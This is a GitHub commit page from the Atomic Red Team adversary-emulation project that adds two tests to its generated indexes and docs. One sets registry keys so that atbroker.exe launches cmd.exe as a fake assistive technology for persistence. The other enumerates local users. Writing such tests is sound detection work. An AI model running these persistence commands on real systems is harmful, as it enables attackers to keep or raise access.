Skip to content

Commit

Permalink
Generated docs from job=generate-docs branch=master [ci skip]
Browse files Browse the repository at this point in the history
  • Loading branch information
Atomic Red Team doc generator committed Jan 20, 2024
1 parent e9ab27e commit f6fc008
Show file tree
Hide file tree
Showing 10 changed files with 208 additions and 2 deletions.

Large diffs are not rendered by default.

Large diffs are not rendered by default.

3 changes: 3 additions & 0 deletions atomics/Indexes/Indexes-CSV/index.csv
Original file line number Diff line number Diff line change
Expand Up @@ -722,6 +722,7 @@ privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution O
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
Expand Down Expand Up @@ -1069,6 +1070,7 @@ persistence,T1546.012,Event Triggered Execution: Image File Execution Options In
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
Expand Down Expand Up @@ -1543,6 +1545,7 @@ discovery,T1033,System Owner/User Discovery,3,Find computers where user has sess
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
discovery,T1033,System Owner/User Discovery,7,System Owner/User Discovery Using Command Prompt,35b88076-7edb-4eb5-bdc5-11ede7f45c6a,command_prompt
discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
Expand Down
3 changes: 3 additions & 0 deletions atomics/Indexes/Indexes-CSV/windows-index.csv
Original file line number Diff line number Diff line change
Expand Up @@ -487,6 +487,7 @@ privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution O
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
Expand Down Expand Up @@ -720,6 +721,7 @@ persistence,T1546.012,Event Triggered Execution: Image File Execution Options In
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
Expand Down Expand Up @@ -1014,6 +1016,7 @@ discovery,T1033,System Owner/User Discovery,3,Find computers where user has sess
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
discovery,T1033,System Owner/User Discovery,7,System Owner/User Discovery Using Command Prompt,35b88076-7edb-4eb5-bdc5-11ede7f45c6a,command_prompt
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
Expand Down
3 changes: 3 additions & 0 deletions atomics/Indexes/Indexes-Markdown/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -962,6 +962,7 @@
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
Expand Down Expand Up @@ -1458,6 +1459,7 @@
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
Expand Down Expand Up @@ -2171,6 +2173,7 @@
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- Atomic Test #6: System Discovery - SocGholish whoami [windows]
- Atomic Test #7: System Owner/User Discovery Using Command Prompt [windows]
- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
- Atomic Test #1: Container and ResourceDiscovery [containers]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
Expand Down
3 changes: 3 additions & 0 deletions atomics/Indexes/Indexes-Markdown/windows-index.md
Original file line number Diff line number Diff line change
Expand Up @@ -671,6 +671,7 @@
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
Expand Down Expand Up @@ -1008,6 +1009,7 @@
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
Expand Down Expand Up @@ -1500,6 +1502,7 @@
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- Atomic Test #6: System Discovery - SocGholish whoami [windows]
- Atomic Test #7: System Owner/User Discovery Using Command Prompt [windows]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
Expand Down
59 changes: 59 additions & 0 deletions atomics/Indexes/index.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -37866,6 +37866,24 @@ privilege-escalation:
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
description: 'Executes code specified in the registry for a new AT (Assistive
Technologies).

'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"

'
name: command_prompt
T1055.004:
technique:
x_mitre_platforms:
Expand Down Expand Up @@ -60126,6 +60144,24 @@ persistence:
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
description: 'Executes code specified in the registry for a new AT (Assistive
Technologies).

'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"

'
name: command_prompt
T1136.002:
technique:
modified: '2023-10-16T17:36:37.600Z'
Expand Down Expand Up @@ -91616,6 +91652,29 @@ discovery:

'
name: powershell
- name: System Owner/User Discovery Using Command Prompt
auto_generated_guid: 35b88076-7edb-4eb5-bdc5-11ede7f45c6a
description: Identify the system owner or current user using native Windows
command prompt utilities.
supported_platforms:
- windows
input_arguments:
output_file_path:
description: Location of output file.
type: string
default: "$env:temp"
executor:
name: command_prompt
elevation_required: false
command: |
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
cleanup_command: 'del #{output_file_path}\\user_info_*.tmp

'
T1613:
technique:
modified: '2023-04-15T16:08:50.706Z'
Expand Down
59 changes: 59 additions & 0 deletions atomics/Indexes/windows-index.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -31293,6 +31293,24 @@ privilege-escalation:
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
description: 'Executes code specified in the registry for a new AT (Assistive
Technologies).

'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"

'
name: command_prompt
T1055.004:
technique:
x_mitre_platforms:
Expand Down Expand Up @@ -49749,6 +49767,24 @@ persistence:
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
description: 'Executes code specified in the registry for a new AT (Assistive
Technologies).

'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"

'
name: command_prompt
T1136.002:
technique:
modified: '2023-10-16T17:36:37.600Z'
Expand Down Expand Up @@ -75054,6 +75090,29 @@ discovery:

'
name: powershell
- name: System Owner/User Discovery Using Command Prompt
auto_generated_guid: 35b88076-7edb-4eb5-bdc5-11ede7f45c6a
description: Identify the system owner or current user using native Windows
command prompt utilities.
supported_platforms:
- windows
input_arguments:
output_file_path:
description: Location of output file.
type: string
default: "$env:temp"
executor:
name: command_prompt
elevation_required: false
command: |
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
cleanup_command: 'del #{output_file_path}\\user_info_*.tmp

'
T1613:
technique:
modified: '2023-04-15T16:08:50.706Z'
Expand Down
39 changes: 39 additions & 0 deletions atomics/T1033/T1033.md
Original file line number Diff line number Diff line change
Expand Up @@ -20,6 +20,8 @@ On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T10

- [Atomic Test #6 - System Discovery - SocGholish whoami](#atomic-test-6---system-discovery---socgholish-whoami)

- [Atomic Test #7 - System Owner/User Discovery Using Command Prompt](#atomic-test-7---system-owneruser-discovery-using-command-prompt)


<br/>

Expand Down Expand Up @@ -239,4 +241,41 @@ Remove-Item -Path #{output_path}\rad*.tmp -Force



<br/>
<br/>

## Atomic Test #7 - System Owner/User Discovery Using Command Prompt
Identify the system owner or current user using native Windows command prompt utilities.

**Supported Platforms:** Windows


**auto_generated_guid:** 35b88076-7edb-4eb5-bdc5-11ede7f45c6a





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file_path | Location of output file. | string | $env:temp|


#### Attack Commands: Run with `command_prompt`!


```cmd
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
```






<br/>
37 changes: 37 additions & 0 deletions atomics/T1546.008/T1546.008.md
Original file line number Diff line number Diff line change
Expand Up @@ -24,6 +24,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi

- [Atomic Test #3 - Create Symbolic Link From osk.exe to cmd.exe](#atomic-test-3---create-symbolic-link-from-oskexe-to-cmdexe)

- [Atomic Test #4 - Atbroker.exe (AT) Executes Arbitrary Command via Registry Key](#atomic-test-4---atbrokerexe-at-executes-arbitrary-command-via-registry-key)


<br/>

Expand Down Expand Up @@ -162,4 +164,39 @@ icacls %windir%\system32\osk.exe /grant:r Administrators:RX



<br/>
<br/>

## Atomic Test #4 - Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
Executes code specified in the registry for a new AT (Assistive Technologies).

**Supported Platforms:** Windows


**auto_generated_guid:** 444ff124-4c83-4e28-8df6-6efd3ece6bd4






#### Attack Commands: Run with `command_prompt`!


```cmd
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
```

#### Cleanup Commands:
```cmd
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
```





<br/>

0 comments on commit f6fc008

Please sign in to comment.